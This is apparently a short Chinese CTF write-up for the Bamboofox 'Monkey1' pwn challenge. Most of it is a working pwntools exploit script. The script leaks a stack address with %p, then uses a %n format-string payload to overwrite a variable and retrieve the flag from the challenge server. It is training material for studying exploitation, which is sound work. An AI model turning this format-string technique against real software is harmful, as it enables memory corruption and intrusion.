# Bamboofox/train/Monkey1 [50] ###### tags: `CTF`,`PWN`,`Bamboofox` 題目檔案連結:http://gofile.me/6lhQ2/oyjNcN1Tw 在program處存在format string漏洞，使用%p取得banana的位置後，用%n寫入 ``` from pwn import * context.arch = "i386" local = False debug = False gdb1 = False if debug == True: context.log_level = "debug" if local == True: p = process("./monkey") elf1 = ELF("./monkey") if gdb1 == True: gdb.attach(p) else: p = remote("bamboofox.cs.nctu.edu.tw",11000) def program(Text): p.recvuntil("choice!\n") p.sendline("2") p.recvuntil("out.\n") p.sendline(Text) def flag(): p.recvuntil("choice!\n") p.sendline("3") print(p.recvuntil("}")) program("%269$p") stack = p.recvuntil("\n") stack = int(stack[0:11],16) banana = stack+4 program(p32(banana)+p32(banana+2)+b"%2c%7$n%12584c%8$n") flag() p.interactive() ```